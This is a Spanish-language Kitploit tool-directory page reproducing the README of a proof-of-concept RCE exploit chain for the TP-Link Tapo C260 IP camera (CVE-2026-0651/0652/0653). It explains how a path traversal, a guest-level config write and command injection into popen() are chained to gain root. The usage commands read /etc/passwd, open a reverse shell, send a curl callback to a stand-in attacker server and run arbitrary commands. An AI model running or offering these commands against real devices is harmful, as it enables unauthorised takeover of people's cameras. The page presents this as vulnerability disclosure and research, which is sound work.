Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/l0lsec/tapo-c260-rce
Seguridad de Sistemas EmbebidosSeguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebHacking de HardwarePruebas de PenetraciónComando y ControlSeguridad de Hardware e IoTAnálisis de Firmware
GitHubl0lsec/tapo-c260-rce

tapo-c260-rce

Cadena de exploits PoC para la cámara TP-Link Tapo C260 — CVE-2026-0651/0652/0653. Investigación de @spaceraccoon.

Ver Repositorio
12hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Cadena RCE Tapo C260 (CVE-2026-0651 / CVE-2026-0652 / CVE-2026-0653)

Prueba de concepto de cadena de explotación para la cámara IP TP-Link Tapo C260 que logra RCE de no autenticado a root encadenando tres vulnerabilidades descubiertas por Eugene Lim (Spaceraccoon).

Créditos

Toda la investigación y el descubrimiento de vulnerabilidades por Eugene Lim (@spaceraccoon).

Este repositorio es una implementación de PoC basada en su artículo público. Si te resulta útil, cómprale su libro: From Day Zero to Zero Day: A Hands-On Guide to Vulnerability Research (No Starch Press).

Cadena de Vulnerabilidades

CVETipoImpacto
CVE-2026-0651Path Traversal / Divulgación de Archivos LocalesLeer archivos arbitrarios mediante /%2e%2e%2f en el manejador HTTP GET
CVE-2026-0652Escritura de Configuración ArbitrariaUsuarios de nivel invitado pueden escribir en cualquier ruta de configuración mediante manipulación de claves JSON en la API en la nube
CVE-2026-0653Inyección de Comandos / Escalada de Privilegiosset_region_code_handle pasa el valor de configuración dev_name sin sanitizar a popen()

Cadena de Ejecución

root@kitploit:~
LFD (leer configuración del dispositivo) --> Escritura de Config (envenenar dev_name) --> Activar manejador de código de región --> popen() --> shell

Requisitos

  • Python 3.8+
  • Acceso de red a la cámara (para LFD) o un token de autenticación válido de TP-Link Cloud (para RCE)
  • Credenciales de nivel invitado son suficientes para la cadena completa

Instalación

root@kitploit:~
git clone https://github.com/<tu_usuario>/tapo-c260-rce.git
cd tapo-c260-rce
pip install -r requirements.txt

Uso

Divulgación de Archivos Locales (CVE-2026-0651)

Leer archivos arbitrarios de una cámara en la red local:

root@kitploit:~
python lfd.py --host 192.168.1.100 --token <stok_token> --file /etc/passwd

Cadena RCE Completa (CVE-2026-0651 + CVE-2026-0652 + CVE-2026-0653)

root@kitploit:~
# Reverse shell
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --lhost <TU_IP> \
  --lport 4444

# Solo callback (ping curl)
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --callback http://tu-servidor.com/pwned

# Comando personalizado
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --cmd "id > /tmp/pwned"

Cómo Funciona

  1. Envenenar — Envía una solicitud setLedStatus con claves JSON manipuladas que escribe una carga útil de metacaracteres de shell en la ruta de configuración tp_manage/info/dev_name del dispositivo.

  2. Activar — Envía una solicitud set_region_code. El manejador lee dev_name de la configuración y lo interpola en una llamada a popen() sin sanitización, ejecutando el comando inyectado.

  3. Shell — El atacante recibe un callback o una reverse shell.

Firmware Afectado

  • TP-Link Tapo C260 (firmware anterior al parche)
  • Potencialmente otros modelos Tapo que compartan el mismo binario ómnibus /bin/main

Aviso Legal

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Los autores no son responsables del mal uso. Siempre obtén permiso explícito antes de probar contra cualquier dispositivo que no poseas.

Referencias

  • Artículo Original — Spaceraccoon
  • Investigación del Protocolo Tapo de Kennedn
  • Aviso de Seguridad de TP-Link
Descargar herramienta